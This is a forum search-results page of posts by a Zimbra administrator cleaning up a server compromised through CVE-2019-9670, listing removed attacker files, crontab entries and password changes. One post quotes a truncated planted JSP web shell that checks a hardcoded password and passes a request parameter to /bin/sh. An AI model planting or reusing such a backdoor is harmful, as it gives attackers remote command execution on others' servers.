Search found 7 matches

by zimbraxtc
Thu Jun 06, 2019 6:59 pm
Forum: Installation and Upgrade
Topic: How does zimbra use DNS, Split DNS, Local IP
Replies: 0
Views: 578

How does zimbra use DNS, Split DNS, Local IP

Hi all Zimbras! Im going to install a 8.8 on a Ubuntu 18. First google-hit was this tutorial: https://computingforgeeks.com/how-to-install-zimbra-collaboration-on-ubuntu-18-04-lts/ States I need a DNS-server. Checking docs and searching forum: https://wiki.zimbra.com/wiki/Split_DNS Saying: "Dep...
by zimbraxtc
Fri May 31, 2019 12:24 pm
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 239
Views: 157964

Re: CVE-2019-9670 being actively exploited

Help me with this plz : /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh",&quo...
by zimbraxtc
Thu May 30, 2019 1:34 pm
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 239
Views: 157964

Re: CVE-2019-9670 being actively exploited

Hi all!

I have a old 5.0 installation running on an old hp-server, dont ask me why. Are the 5.0 affected by the virus?

Anyone knows?

Thanks!
by zimbraxtc
Tue May 28, 2019 4:05 pm
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 239
Views: 157964

Re: CVE-2019-9670 being actively exploited

Has anyone with recurring infections checked if the attacker uploaded a key to /opt/zimbra/.ssh/authorized_keys ? Or if there are remote ssh logins for the zimbra user? Yes, apparently the chinese guys takes control of zimbra user, they load a tons of script en /tmp/ and /opt/zimbra/log/ some are h...
by zimbraxtc
Tue May 28, 2019 10:37 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 239
Views: 157964

Re: CVE-2019-9670 being actively exploited

elby wrote:
zimbraxtc wrote:
Drake wrote:Hello guys


Thanks!

Dont miss:
/opt/zimbra/log/zmswatch and zmswatch.sh


This is a zimbra files or exploit ?

My crontab is empty. How can i regenerate it?


exploit, just remove them

might be a differnt path to your crontab, mine is /var/spool/cron/crontabs/zimbra
by zimbraxtc
Tue May 28, 2019 9:15 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 239
Views: 157964

Re: CVE-2019-9670 being actively exploited

Drake wrote:Hello guys


Thanks!

Dont miss:
/opt/zimbra/log/zmswatch and zmswatch.sh
by zimbraxtc
Tue May 28, 2019 8:18 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 239
Views: 157964

Re: CVE-2019-9670 being actively exploited

Hello all! I have the same issue on a 8.6 Ubuntu. - added patch - clean /var/spool/cron/crontabs/zimbra (line at the end) - clean /opt/zimbra/log/zmswatch and zmswatch.sh - removed added email-accounts (only one) - changed the admin-pass for zimbra-user - cant find any strange .jsp-files. - clean /o...

Go to advanced search